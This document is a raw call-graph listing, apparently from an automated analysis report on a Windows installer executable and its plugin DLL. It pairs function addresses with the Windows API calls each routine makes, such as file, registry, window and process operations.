100017be 4340 100017c4 4338->4340 4344 100017cf 4338->4344 4340->4350 4412 100028a4 4340->4412 4346 100015b4 3 API calls 4341->4346 4348 100024a9 10 API calls 4342->4348 4343 100017f4 4442 100015b4 4343->4442 4422 10002645 4344->4422 4352 10001828 4346->4352 4353 10001840 4348->4353 4350->4335 4350->4336 4356 100024a9 10 API calls 4352->4356 4357 10001895 4353->4357 4453 1000246c 4353->4453 4355 100017d5 4355->4350 4356->4353 4357->4328 4361 1000189f GlobalFree 4357->4361 4361->4328 4363 10001881 4363->4357 4457 1000153d wsprintfW 4363->4457 4364 1000187a FreeLibrary 4364->4363 4367 4051b4 25 API calls 4366->4367 4368 401431 4367->4368 4368->4312 4460 1000121b GlobalAlloc 4369->4460 4371 10001b3c 4461 1000121b GlobalAlloc 4371->4461 4373 10001d7a GlobalFree GlobalFree GlobalFree 4374 10001d97 4373->4374 4391 10001de1 4373->4391 4375 100020ee 4374->4375 4383 10001dac 4374->4383 4374->4391 4377 10002110 GetModuleHandleW 4375->4377 4375->4391 4376 10001c1d GlobalAlloc 4394 10001b47 4376->4394 4379 10002121 LoadLibraryW 4377->4379 4380 10002136 4377->4380 4378 10001c86 GlobalFree 4378->4394 4379->4380 4379->4391 4468 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4380->4468 4381 10001c68 lstrcpyW 4384 10001c72 lstrcpyW 4381->4384 4383->4391 4464 1000122c 4383->4464 4384->4394 4385 10002188 4387 10002195 lstrlenW 4385->4387 4385->4391 4386 10002048 4386->4391 4395 10002090 lstrcpyW 4386->4395 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4387->4469 4391->4327 4392 10002148 4392->4385 4400 10002172 GetProcAddress 4392->4400 4393 100021af 4393->4391 4394->4373 4394->4376 4394->4378 4394->4381 4394->4384 4394->4386 4394->4391 4396 10001cc4 4394->4396 4397 10001f37 GlobalFree 4394->4397 4399 1000122c 2 API calls 4394->4399 4467 1000121b GlobalAlloc 4394->4467 4395->4391 4396->4394 4462 1000158f GlobalSize GlobalAlloc 4396->4462 4397->4394 4399->4394 4400->4385 4408 100022e8 4401->4408 4403 10002415 GlobalFree 4407 100017ae 4403->4407 4403->4408 4404 100023d3 lstrlenW 4404->4403 4411 100023de 4404->4411 4405 100023ba GlobalAlloc CLSIDFromString 4405->4403 4406 1000238f GlobalAlloc WideCharToMultiByte 4406->4403 4407->4337 4407->4338 4407->4350 4408->4403 4408->4404 4408->4405 4408->4406 4409 1000122c GlobalAlloc lstrcpynW 4408->4409 4471 100012ba 4408->4471 4409->4408 4411->4403 4475 100025d9 4411->4475 4414 100028b6 4412->4414 4413 1000295b SetFilePointer 4415 10002979 4413->4415 4414->4413 4416 10002a75 4415->4416 4417 10002a6a GetLastError 4415->4417 4416->4350 4417->4416 4419 10002296 4418->4419 4420 100017a7 4418->4420 4419->4420 4421 100022a8 GlobalAlloc 4419->4421 4420->4330 4421->4419 4426 10002661 4422->4426 4423 100026b2 GlobalAlloc 4427 100026d4 4423->4427 4424 100026c5 4425 100026ca GlobalSize 4424->4425 4424->4427 4425->4427 4426->4423 4426->4424 4427->4355 4430 10002b6a 4428->4430 4429 10002baa GlobalFree 4430->4429 4478 1000121b GlobalAlloc 4431->4478 4433 10002530 StringFromGUID2 4439 100024b3 4433->4439 4434 10002541 lstrcpynW 4434->4439 4435 1000250b MultiByteToWideChar 4435->4439 4436 10002571 GlobalFree 4436->4439 4437 10002554 wsprintfW 4437->4439 4438 100025ac GlobalFree 4438->4343 4439->4433 4439->4434 4439->4435 4439->4436 4439->4437 4439->4438 4440 10001272 2 API calls 4439->4440 4479 100012e1 4439->4479 4440->4439 4483 1000121b GlobalAlloc 4442->4483 4444 100015ba 4445 100015c7 lstrcpyW 4444->4445 4447 100015e1 4444->4447 4448 100015fb 4445->4448 4447->4448 4449 100015e6 wsprintfW 4447->4449 4450 10001272 4448->4450 4449->4448 4451 100012b5 GlobalFree 4450->4451 4452 1000127b GlobalAlloc lstrcpynW 4450->4452 4451->4353 4452->4451 4454 1000247a 4453->4454 4455 10001861 4453->4455 4454->4455 4456 10002496 GlobalFree 4454->4456 4455->4363 4455->4364 4456->4454 4458 10001272 2 API calls 4457->4458 4459 1000155e 4458->4459 4459->4357 4460->4371 4461->4394 4463 100015ad 4462->4463 4463->4396 4470 1000121b GlobalAlloc 4464->4470 4466 1000123b lstrcpynW 4466->4391 4467->4394 4468->4392 4469->4393 4470->4466 4472 100012c1 4471->4472 4473 1000122c 2 API calls 4472->4473 4474 100012df 4473->4474 4474->4408 4476 100025e7 VirtualAlloc 4475->4476 4477 1000263d 4475->4477 4476->4477 4477->4411 4478->4439 4480 100012ea 4479->4480 4481 1000130c 4479->4481 4480->4481 4482 100012f0 lstrcpyW 4480->4482 4481->4439 4482->4481 4483->4444 4837 4016c4 4838 402bbf 18 API calls 4837->4838 4839 4016ca GetFullPathNameW 4838->4839 4840 4016e4 4839->4840 4841 401706 4839->4841 4840->4841 4844 406398 2 API calls 4840->4844 4842 40171b GetShortPathNameW 4841->4842 4843 402a4c 4841->4843 4842->4843 4845 4016f6 4844->4845 4845->4841 4847 406055 lstrcpynW 4845->4847 4847->4841 4848 4014cb 4849 4051b4 25 API calls 4848->4849 4850 4014d2 4849->4850 4851 40194e 4852 402bbf 18 API calls 4851->4852 4853 401955 lstrlenW 4852->4853 4854 402531 4853->4854 4855 4027ce 4856 4027d6 4855->4856 4857 4027da FindNextFileW 4856->4857 4860 4027ec 4856->4860 4858 402833 4857->4858 4857->4860 4861 406055 lstrcpynW 4858->4861 4861->4860 4681 401754 4682 402bbf 18 API calls 4681->4682 4683 40175b 4682->4683 4684 405c59 2 API calls 4683->4684 4685 401762 4684->4685 4686 405c59 2 API calls 4685->4686 4686->4685 4862 401d56 GetDC GetDeviceCaps 4863 402ba2 18 API calls 4862->4863 4864 401d74 MulDiv ReleaseDC 4863->4864 4865 402ba2 18 API calls 4864->4865 4866 401d93 4865->4866 4867 406077 18 API calls 4866->4867 4868 401dcc CreateFontIndirectW 4867->4868 4869 402531 4868->4869 4870 401a57 4871 402ba2 18 API calls 4870->4871 4872 401a5d 4871->4872 4873 402ba2 18 API calls 4872->4873 4874 401a05 4873->4874 4875 4014d7 4876 402ba2 18 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402a4c 4877->4879 4880 40155b 4881 4029f2 4880->4881 4884 405f9c wsprintfW 4881->4884 4883 4029f7 4884->4883 4760 401ddc 4761 402ba2 18 API calls 4760->4761 4762 401de2 4761->4762 4763 402ba2 18 API calls 4762->4763 4764 401deb 4763->4764 4765 401df2 ShowWindow 4764->4765 4766 401dfd EnableWindow 4764->4766 4767 402a4c 4765->4767 4766->4767 4885 40385c 4886 403867 4885->4886 4887 40386b 4886->4887 4888 40386e GlobalAlloc 4886->4888 4888->4887 4889 4022df 4890 402bbf 18 API calls 4889->4890 4891 4022ee 4890->4891 4892 402bbf 18 API calls 4891->4892 4893 4022f7 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 402301 GetPrivateProfileStringW 4894->4895 4896 401bdf 4897 402ba2 18 API calls 4896->4897 4898 401be6 4897->4898 4899 402ba2 18 API calls 4898->4899 4900 401bf0 4899->4900 4901 401c00 4900->4901 4903 402bbf 18 API calls 4900->4903 4902 401c10 4901->4902 4904 402bbf 18 API calls 4901->4904 4905 401c1b 4902->4905 4906 401c5f 4902->4906 4903->4901 4904->4902 4907 402ba2 18 API calls 4905->4907 4908 402bbf 18 API calls 4906->4908 4909 401c20 4907->4909 4910 401c64 4908->4910 4912 402ba2 18 API calls 4909->4912 4911 402bbf 18 API calls 4910->4911 4913 401c6d FindWindowExW 4911->4913 4914 401c29 4912->4914 4917 401c8f 4913->4917 4915 401c31 SendMessageTimeoutW 4914->4915 4916 401c4f SendMessageW 4914->4916 4915->4917 4916->4917 4918 401960 4919 402ba2 18 API calls 4918->4919 4920 401967 4919->4920 4921 402ba2 18 API calls 4920->4921 4922 401971 4921->4922 4923 402bbf 18 API calls 4922->4923 4924 40197a 4923->4924 4925 40198e lstrlenW 4924->4925 4926 4019ca 4924->4926 4927 401998 4925->4927 4927->4926 4931 406055 lstrcpynW 4927->4931 4929 4019b3 4929->4926 4930 4019c0 lstrlenW 4929->4930 4930->4926 4931->4929 4932 401662 4933 402bbf 18 API calls 4932->4933 4934 401668 4933->4934 4935 406398 2 API calls 4934->4935 4936 40166e 4935->4936 4937 4019e4 4938 402bbf 18 API calls 4937->4938 4939 4019eb 4938->4939 4940 402bbf 18 API calls 4939->4940 4941 4019f4 4940->4941 4942 4019fb lstrcmpiW 4941->4942 4943 401a0d lstrcmpW 4941->4943 4944 401a01 4942->4944 4943->4944 4484 4025e5 4498 402ba2 4484->4498 4486 40263a ReadFile 4493 4025f4 4486->4493 4497 40272d 4486->4497 4487 4026d3 4487->4493 4487->4497 4501 405d0b SetFilePointer 4487->4501 4488 405cad ReadFile 4488->4493 4490 40267a MultiByteToWideChar 4490->4493 4491 40272f 4510 405f9c wsprintfW 4491->4510 4493->4486 4493->4487 4493->4488 4493->4490 4493->4491 4494 4026a0 SetFilePointer MultiByteToWideChar 4493->4494 4495 402740 4493->4495 4493->4497 4494->4493 4496 402761 SetFilePointer 4495->4496 4495->4497 4496->4497 4499 406077 18 API calls 4498->4499 4500 402bb6 4499->4500 4500->4493 4502 405d27 4501->4502 4504 405d43 4501->4504 4503 405cad ReadFile 4502->4503 4505 405d33 4503->4505 4504->4487 4505->4504 4506 405d74 SetFilePointer 4505->4506 4507 405d4c SetFilePointer 4505->4507 4506->4504 4507->4506 4508 405d57 4507->4508 4509 405cdc WriteFile 4508->4509 4509->4504 4510->4497 4945 401e66 4946 402bbf 18 API calls 4945->4946 4947 401e6c 4946->4947 4948 4051b4 25 API calls 4947->4948 4949 401e76 4948->4949 4950 405735 2 API calls 4949->4950 4951 401e7c 4950->4951 4952 401edb CloseHandle 4951->4952 4953 401e8c WaitForSingleObject 4951->4953 4954 40281e 4951->4954 4952->4954 4955 401e9e 4953->4955 4956 401eb0 GetExitCodeProcess 4955->4956 4957 406467 2 API calls 4955->4957 4958 401ec2 4956->4958 4959 401ecd 4956->4959 4960 401ea5 WaitForSingleObject 4957->4960 4962 405f9c wsprintfW 4958->4962 4959->4952 4960->4955 4962->4959 4520 401767 4521 402bbf 18 API calls 4520->4521 4522 40176e 4521->4522 4523 401796 4522->4523 4524 40178e 4522->4524 4561 406055 lstrcpynW 4523->4561 4560 406055 lstrcpynW 4524->4560 4527 401794 4530 4062e9 5 API calls 4527->4530 4528 4017a1 4529 405a09 3 API calls 4528->4529 4531 4017a7 lstrcatW 4529->4531 4539 4017b3 4530->4539 4531->4527 4532 406398 2 API calls 4532->4539 4533 4017ef 4534 405c05 2 API calls 4533->4534 4534->4539 4536 4017c5 CompareFileTime 4536->4539 4537 401885 4538 4051b4 25 API calls 4537->4538 4541 40188f 4538->4541 4539->4532 4539->4533 4539->4536 4539->4537 4540 406055 lstrcpynW 4539->4540 4546 406077 18 API calls 4539->4546 4554 40579a MessageBoxIndirectW 4539->4554 4557 40185c 4539->4557 4559 405c2a GetFileAttributesW CreateFileW 4539->4559 4540->4539 4543 403027 32 API calls 4541->4543 4542 4051b4 25 API calls 4558 401871 4542->4558 4544 4018a2 4543->4544 4545 4018b6 SetFileTime 4544->4545 4547 4018c8 CloseHandle 4544->4547 4545->4547 4546->4539 4548 4018d9 4547->4548 4547->4558 4549 4018f1 4548->4549 4550 4018de 4548->4550 4552 406077 18 API calls 4549->4552 4551 406077 18 API calls 4550->4551 4555 4018e6 lstrcatW 4551->4555 4553 4018f9 4552->4553 4556 40579a MessageBoxIndirectW 4553->4556 4554->4539 4555->4553 4556->4558 4557->4542 4557->4558 4559->4539 4560->4527 4561->4528 4963 404267 lstrlenW 4964 404286 4963->4964 4965 404288 WideCharToMultiByte 4963->4965 4964->4965 4966 401ee9 4967 402bbf 18 API calls 4966->4967 4968 401ef0 4967->4968 4969 406398 2 API calls 4968->4969 4970 401ef6 4969->4970 4971 401f07 4970->4971 4973 405f9c wsprintfW 4970->4973 4973->4971 4974 100018a9 4975 100018cc 4974->4975 4976 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4975->4976 4977 100018ff GlobalFree 4975->4977 4978 10001272 2 API calls 4976->4978 4977->4976 4979 10001a87 GlobalFree GlobalFree 4978->4979 4980 4021ea 4981 402bbf 18 API calls 4980->4981 4982 4021f0 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 4021f9 4983->4984 4985 402bbf 18 API calls 4984->4985 4986 402202 4985->4986 4987 406398 2 API calls 4986->4987 4988 40220b 4987->4988 4989 40221c lstrlenW lstrlenW 4988->4989 4990 40220f 4988->4990 4992 4051b4 25 API calls 4989->4992 4991 4051b4 25 API calls 4990->4991 4994 402217 4990->4994 4991->4994 4993 40225a SHFileOperationW 4992->4993 4993->4990 4993->4994 4995 40156b 4996 401584 4995->4996 4997 40157b ShowWindow 4995->4997 4998 401592 ShowWindow 4996->4998 4999 402a4c 4996->4999 4997->4996 4998->4999 5000 40456d 5001 4045a3 5000->5001 5002 40457d 5000->5002 5004 404180 8 API calls 5001->5004 5003 404119 19 API calls 5002->5003 5005 40458a SetDlgItemTextW 5003->5005 5006 4045af 5004->5006 5005->5001 5007 40226e 5008 402275 5007->5008 5010 402288 5007->5010 5009 406077 18 API calls 5008->5009 5011 402282 5009->5011 5012 40579a MessageBoxIndirectW 5011->5012 5012->5010 5013 4014f1 SetForegroundWindow 5014 402a4c 5013->5014 5015 401673 5016 402bbf 18 API calls 5015->5016 5017 40167a 5016->5017 5018 402bbf 18 API calls 5017->5018 5019 401683 5018->5019 5020 402bbf 18 API calls 5019->5020 5021 40168c MoveFileW 5020->5021 5022 40169f 5021->5022 5028 401698 5021->5028 5024 406398 2 API calls 5022->5024 5026 4021e1 5022->5026 5023 401423 25 API calls 5023->5026 5025 4016ae 5024->5025 5025->5026 5027 405ef6 38 API calls 5025->5027 5027->5028 5028->5023 5029 4052f3 5030 405314 GetDlgItem GetDlgItem GetDlgItem 5029->5030 5031 40549d 5029->5031 5074 40414e SendMessageW 5030->5074 5033 4054a6 GetDlgItem CreateThread CloseHandle 5031->5033 5034 4054ce 5031->5034 5033->5034 5036 4054f9 5034->5036 5037 4054e5 ShowWindow ShowWindow 5034->5037 5038 40551e 5034->5038 5035 405384 5043 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5035->5043 5040 405533 ShowWindow 5036->5040 5041 40550d 5036->5041 5044 405559 5036->5044 5076 40414e SendMessageW 5037->5076 5042 404180 8 API calls 5038->5042 5047 405553 5040->5047 5048 405545 5040->5048 5045 4040f2 SendMessageW 5041->5045 5046 40552c 5042->5046 5049 4053f9 5043->5049 5050 4053dd SendMessageW SendMessageW 5043->5050 5044->5038 5051 405567 SendMessageW 5044->5051 5045->5038 5056 4040f2 SendMessageW 5047->5056 5055 4051b4 25 API calls 5048->5055 5052 40540c 5049->5052 5053 4053fe SendMessageW 5049->5053 5050->5049 5051->5046 5054 405580 CreatePopupMenu 5051->5054 5058 404119 19 API calls 5052->5058 5053->5052 5057 406077 18 API calls 5054->5057 5055->5047 5056->5044 5059 405590 AppendMenuW 5057->5059 5060 40541c 5058->5060 5061 4055c0 TrackPopupMenu 5059->5061 5062 4055ad GetWindowRect 5059->5062 5063 405425 ShowWindow 5060->5063 5064 405459 GetDlgItem SendMessageW 5060->5064 5061->5046 5065 4055db 5061->5065 5062->5061 5066 405448 5063->5066 5067 40543b ShowWindow 5063->5067 5064->5046 5068 405480 SendMessageW SendMessageW 5064->5068 5069 4055f7 SendMessageW 5065->5069 5075 40414e SendMessageW 5066->5075 5067->5066 5068->5046 5069->5069 5070 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5069->5070 5072 405639 SendMessageW 5070->5072 5072->5072 5073 405662 GlobalUnlock SetClipboardData CloseClipboard 5072->5073 5073->5046 5074->5035 5075->5064 5076->5036 5077 100016b6 5078 100016e5 5077->5078 5079 10001b18 22 API calls 5078->5079 5080 100016ec 5079->5080 5081 100016f3 5080->5081 5082 100016ff 5080->5082 5083 10001272 2 API calls 5081->5083 5084 10001726 5082->5084 5085 10001709 5082->5085 5088 100016fd 5083->5088 5086 10001750 5084->5086 5087 1000172c 5084->5087 5089 1000153d 3 API calls 5085->5089 5091 1000153d 3 API calls 5086->5091 5090 100015b4 3 API calls 5087->5090 5092 1000170e 5089->5092 5093 10001731 5090->5093 5091->5088 5094 100015b4 3 API calls 5092->5094 5095 10001272 2 API calls 5093->5095 5096 10001714 5094->5096 5097 10001737 GlobalFree 5095->5097 5098 10001272 2 API calls 5096->5098 5097->5088 5099 1000174b GlobalFree 5097->5099 5100 1000171a GlobalFree 5098->5100 5099->5088 5100->5088 5101 10002238 5102 10002296 5101->5102 5104 100022cc 5101->5104 5103 100022a8 GlobalAlloc 5102->5103 5102->5104 5103->5102 5105 401cfa GetDlgItem GetClientRect 5106 402bbf 18 API calls 5105->5106 5107 401d2c LoadImageW SendMessageW 5106->5107 5108 401d4a DeleteObject 5107->5108 5109 402a4c 5107->5109 5108->5109 4729 4027fb 4730 402bbf 18 API calls 4729->4730 4731 402802 FindFirstFileW 4730->4731 4732 40282a 4731->4732 4736 402815 4731->4736 4733 402833 4732->4733 4737 405f9c wsprintfW 4732->4737 4738 406055 lstrcpynW 4733->4738 4737->4733 4738->4736 4739 40237b 4740 402381 4739->4740 4741 402bbf 18 API calls 4740->4741 4742 402393 4741->4742 4743 402bbf 18 API calls 4742->4743 4744 40239d RegCreateKeyExW 4743->4744 4745 4023c7 4744->4745 4747 40281e 4744->4747 4746 4023e2 4745->4746 4748 402bbf 18 API calls 4745->4748 4750 402ba2 18 API calls 4746->4750 4752 4023ee 4746->4752 4749 4023d8 lstrlenW 4748->4749 4749->4746 4750->4752 4751 402409 RegSetValueExW 4754 40241f RegCloseKey 4751->4754 4752->4751 4753 403027 32 API calls 4752->4753 4753->4751 4754->4747 5110 1000103d 5111 1000101b 5 API calls 5110->5111 5112 10001056 5111->5112 5113 4014ff 5114 401507 5113->5114 5116 40151a 5113->5116 5115 402ba2 18 API calls 5114->5115 5115->5116 5117 401000 5118 401037 BeginPaint GetClientRect 5117->5118 5119 40100c DefWindowProcW 5117->5119 5121 4010f3 5118->5121 5122 401179 5119->5122 5123 401073 CreateBrushIndirect FillRect DeleteObject 5121->5123 5124 4010fc 5121->5124 5123->5121 5125 401102 CreateFontIndirectW 5124->5125 5126 401167 EndPaint 5124->5126 5125->5126 5127 401112 6 API calls 5125->5127 5126->5122 5127->5126 5128 401904 5129 40193b 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401940 5130->5131 5132 405846 69 API calls 5131->5132 5133 401949 5132->5133 5134 402d04 5135 402d16 SetTimer 5134->5135 5137 402d2f 5134->5137 5135->5137 5136 402d84 5137->5136 5138 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5137->5138 5138->5136 4511 402786 4512 40278d 4511->4512 4514 4029f7 4511->4514 4513 402ba2 18 API calls 4512->4513 4515 402798 4513->4515 4516 40279f SetFilePointer 4515->4516 4516->4514 4517 4027af 4516->4517 4519 405f9c wsprintfW 4517->4519 4519->4514 4562 100027c7 4563 10002817 4562->4563 4564 100027d7 VirtualProtect 4562->4564 4564->4563 5139 401907 5140 402bbf 18 API calls 5139->5140 5141 40190e 5140->5141 5142 40579a MessageBoxIndirectW 5141->5142 5143 401917 5142->5143 5144 401e08 5145 402bbf 18 API calls 5144->5145 5146 401e0e 5145->5146 5147 402bbf 18 API calls 5146->5147 5148 401e17 5147->5148 5149 402bbf 18 API calls 5148->5149 5150 401e20 5149->5150 5151 402bbf 18 API calls 5150->5151 5152 401e29 5151->5152 5153 401423 25 API calls 5152->5153 5154 401e30 ShellExecuteW 5153->5154 5155 401e61 5154->5155 5161 40490a 5162 404936 5161->5162 5163 40491a 5161->5163 5165 404969 5162->5165 5166 40493c SHGetPathFromIDListW 5162->5166 5172 40577e GetDlgItemTextW 5163->5172 5168 404953 SendMessageW 5166->5168 5169 40494c 5166->5169 5167 404927 SendMessageW 5167->5162 5168->5165 5170 40140b 2 API calls 5169->5170 5170->5168 5172->5167 5173 1000164f 5174 10001516 GlobalFree 5173->5174 5176 10001667 5174->5176 5175 100016ad GlobalFree 5176->5175 5177 10001682 5176->5177 5178 10001699 VirtualFree 5176->5178 5177->5175 5178->5175 4687 402095 4688 402bbf 18 API calls 4687->4688 4689 40209c 4688->4689 4690 402bbf 18 API calls 4689->4690 4691 4020a6 4690->4691 4692 402bbf 18 API calls 4691->4692 4693 4020b0 4692->4693 4694 402bbf 18 API calls 4693->4694 4695 4020ba 4694->4695 4696 402bbf 18 API calls 4695->4696 4698 4020c4 4696->4698 4697 402103 CoCreateInstance 4702 402122 4697->4702 4698->4697 4699 402bbf 18 API calls 4698->4699 4699->4697 4700 401423 25 API calls 4701 4021e1 4700->4701 4702->4700 4702->4701 5179 401a15 5180 402bbf 18 API calls 5179->5180 5181 401a1e ExpandEnvironmentStringsW 5180->5181 5182 401a32 5181->5182 5184 401a45 5181->5184 5183 401a37 lstrcmpW 5182->5183 5182->5184 5183->5184 5185 402515 5186 402bbf 18 API calls 5185->5186 5187 40251c 5186->5187 5190 405c2a GetFileAttributesW CreateFileW 5187->5190 5189 402528 5189->5189 5190->5189 5191 401b16 5192 402bbf 18 API calls 5191->5192 5193 401b1d 5192->5193 5194 402ba2 18 API calls 5193->5194 5195 401b26 wsprintfW 5194->5195 5196 402a4c 5195->5196 5197 10001058 5199 10001074 5197->5199 5198 100010dd 5199->5198 5200 10001516 GlobalFree 5199->5200 5201 10001092 5199->5201 5200->5201 5202 10001516 GlobalFree 5201->5202 5203 100010a2 5202->5203 5204 100010b2 5203->5204 5205 100010a9 GlobalSize 5203->5205 5206 100010b6 GlobalAlloc 5204->5206 5207 100010c7 5204->5207 5205->5204 5208 1000153d 3 API calls 5206->5208 5209 100010d2 GlobalFree 5207->5209 5208->5207 5209->5198 4756 40159b 4757 402bbf 18 API calls 4756->4757 4758 4015a2 SetFileAttributesW 4757->4758 4759 4015b4 4758->4759 4768 40229d 4769 4022a5 4768->4769 4770 4022ab 4768->4770 4772 402bbf 18 API calls 4769->4772 4771 4022b9 4770->4771 4773 402bbf 18 API calls 4770->4773 4774 4022c7 4771->4774 4775 402bbf 18 API calls 4771->4775 4772->4770 4773->4771 4776 402bbf 18 API calls 4774->4776 4775->4774 4777 4022d0 WritePrivateProfileStringW 4776->4777 5210 401f1d 5211 402bbf 18 API calls 5210->5211 5212 401f24 5211->5212 5213 40642b 5 API calls 5212->5213 5214 401f33 5213->5214 5215 401fb7 5214->5215 5216 401f4f GlobalAlloc 5214->5216 5216->5215 5217 401f63 5216->5217 5218 40642b 5 API calls 5217->5218 5219 401f6a 5218->5219 5220 40642b 5 API calls 5219->5220 5221 401f74 5220->5221 5221->5215 5225 405f9c wsprintfW 5221->5225 5223 401fa9 5226 405f9c wsprintfW 5223->5226 5225->5223 5226->5215 5227 40149e 5228 402288 5227->5228 5229 4014ac PostQuitMessage 5227->5229 5229->5228 5230 40249e 5231 402cc9 19 API calls 5230->5231 5232 4024a8 5231->5232 5233 402ba2 18 API calls 5232->5233 5234 4024b1 5233->5234 5235 4024d5 RegEnumValueW 5234->5235 5236 4024c9 RegEnumKeyW 5234->5236 5238 40281e 5234->5238 5237 4024ee RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 40231f 5241 402324 5240->5241 5242 40234f 5240->5242 5243 402cc9 19 API calls 5241->5243 5244 402bbf 18 API calls 5242->5244 5245 40232b 5243->5245 5246 402356 5244->5246 5247 402bbf 18 API calls 5245->5247 5248 40236c 5245->5248 5251 402bff RegOpenKeyExW 5246->5251 5249 40233c RegDeleteValueW RegCloseKey 5247->5249 5249->5248 5258 402c76 5251->5258 5259 402c2a 5251->5259 5252 402c50 RegEnumKeyW 5253 402c62 RegCloseKey 5252->5253 5252->5259 5255 40642b 5 API calls 5253->5255 5254 402c87 RegCloseKey 5254->5258 5257 402c72 5255->5257 5256 402bff 5 API calls 5256->5259 5257->5258 5260 402ca2 RegDeleteKeyW 5257->5260 5258->5248 5259->5252 5259->5253 5259->5254 5259->5256 5260->5258 3715 4032a0 SetErrorMode GetVersion 3716 4032d4 3715->3716 3717 4032da 3715->3717 3718 40642b 5 API calls 3716->3718 3806 4063bf GetSystemDirectoryW 3717->3806 3718->3717 3720 4032f1 3721 4063bf 3 API calls 3720->3721 3722 4032fb 3721->3722 3723 4063bf 3 API calls 3722->3723 3724 403305 3723->3724 3809 40642b GetModuleHandleA 3724->3809 3727 40642b 5 API calls 3728 403313 #17 OleInitialize SHGetFileInfoW 3727->3728 3815 406055 lstrcpynW 3728->3815 3730 403350 GetCommandLineW 3816 406055 lstrcpynW 3730->3816 3732 403362 GetModuleHandleW 3733 40337a 3732->3733 3817 405a36 3733->3817 3736 4034b4 GetTempPathW 3821 40326f 3736->3821 3738 4034cc 3739 4034d0 GetWindowsDirectoryW lstrcatW 3738->3739 3740 403526 DeleteFileW 3738->3740 3742 40326f 12 API calls 3739->3742 3831 402dee GetTickCount GetModuleFileNameW 3740->3831 3741 4033a2 3743 405a36 CharNextW 3741->3743 3749 40349f 3741->3749 3751 40349d 3741->3751 3745 4034ec 3742->3745 3743->3741 3745->3740 3747 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3745->3747 3746 40353a 3752 405a36 CharNextW 3746->3752 3788 4035dd 3746->3788 3801 4035ed 3746->3801 3750 40326f 12 API calls 3747->3750 3915 406055 lstrcpynW 3749->3915 3756 40351e 3750->3756 3751->3736 3768 403559 3752->3768 3756->3740 3756->3801 3757 403728 3760 403730 GetCurrentProcess OpenProcessToken 3757->3760 3761 4037ac ExitProcess 3757->3761 3758 403608 3939 40579a 3758->3939 3766 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3760->3766 3767 40377c 3760->3767 3763 4035b7 3916 405b11 3763->3916 3764 40361e 3943 40571d 3764->3943 3766->3767 3771 40642b 5 API calls 3767->3771 3768->3763 3768->3764 3782 403783 3771->3782 3774 403798 ExitWindowsEx 3774->3761 3777 4037a5 3774->3777 3775 403634 lstrcatW 3776 40363f lstrcatW lstrcmpiW 3775->3776 3779 40365b 3776->3779 3776->3801 3981 40140b 3777->3981 3780 403660 3779->3780 3781 403667 3779->3781 3946 405683 CreateDirectoryW 3780->3946 3951 405700 CreateDirectoryW 3781->3951 3782->3774 3782->3777 3784 4035d2 3931 406055 lstrcpynW 3784->3931 3859 40389e 3788->3859 3790 40366c SetCurrentDirectoryW 3791 403687 3790->3791 3792 40367c 3790->3792 3955 406055 lstrcpynW 3791->3955 3954 406055 lstrcpynW 3792->3954 3797 4036d3 CopyFileW 3803 403695 3797->3803 3798 40371c 3800 405ef6 38 API calls 3798->3800 3800->3801 3932 4037c4 3801->3932 3802 406077 18 API calls 3802->3803 3803->3798 3803->3802 3805 403707 CloseHandle 3803->3805 3956 406077 3803->3956 3974 405ef6 MoveFileExW 3803->3974 3978 405735 CreateProcessW 3803->3978 3805->3803 3807 4063e1 wsprintfW LoadLibraryW 3806->3807 3807->3720 3810 406451 GetProcAddress 3809->3810 3811 406447 3809->3811 3813 40330c 3810->3813 3812 4063bf 3 API calls 3811->3812 3814 40644d 3812->3814 3813->3727 3814->3810 3814->3813 3815->3730 3816->3732 3818 405a3c 3817->3818 3819 403389 CharNextW 3818->3819 3820 405a43 CharNextW 3818->3820 3819->3736 3819->3741 3820->3818 3984 4062e9 3821->3984 3823 403285 3823->3738 3824 40327b 3824->3823 3993 405a09 lstrlenW CharPrevW 3824->3993 3827 405700 2 API calls 3828 403293 3827->3828 3996 405c59 3828->3996 4000 405c2a GetFileAttributesW CreateFileW 3831->4000 3833 402e2e 3852 402e3e 3833->3852 4001 406055 lstrcpynW 3833->4001 3835 402e54 4002 405a55 lstrlenW 3835->4002 3839 402e65 GetFileSize 3840 402f61 3839->3840 3858 402e7c 3839->3858 4007 402d8a 3840->4007 3842 402f6a 3844 402f9a GlobalAlloc 3842->3844 3842->3852 4042 403258 SetFilePointer 3842->4042 4018 403258 SetFilePointer 3844->4018 3847 402fcd 3849 402d8a 6 API calls 3847->3849 3848 402fb5 4019 403027 3848->4019 3849->3852 3850 402f83 3853 403242 ReadFile 3850->3853 3852->3746 3855 402f8e 3853->3855 3854 402d8a 6 API calls 3854->3858 3855->3844 3855->3852 3856 402fc1 3856->3852 3856->3856 3857 402ffe SetFilePointer 3856->3857 3857->3852 3858->3840 3858->3847 3858->3852 3858->3854 4039 403242 3858->4039 3860 40642b 5 API calls 3859->3860 3861 4038b2 3860->3861 3862 4038b8 GetUserDefaultUILanguage 3861->3862 3863 4038ca 3861->3863 4063 405f9c wsprintfW 3862->4063 4073 405f22 RegOpenKeyExW 3863->4073 3866 4038c8 4064 403b74 3866->4064 3868 403919 lstrcatW 3868->3866 3869 405f22 3 API calls 3869->3868 3872 405b11 18 API calls 3873 40394b 3872->3873 3874 4039df 3873->3874 3877 405f22 3 API calls 3873->3877 3875 405b11 18 API calls 3874->3875 3876 4039e5 3875->3876 3879 4039f5 LoadImageW 3876->3879 3880 406077 18 API calls 3876->3880 3878 40397d 3877->3878 3878->3874 3883 40399e lstrlenW 3878->3883 3887 405a36 CharNextW 3878->3887 3881 403a9b 3879->3881 3882 403a1c RegisterClassW 3879->3882 3880->3879 3886 40140b 2 API calls 3881->3886 3884 403a52 SystemParametersInfoW CreateWindowExW 3882->3884 3885 403aa5 3882->3885 3888 4039d2 3883->3888 3889 4039ac lstrcmpiW 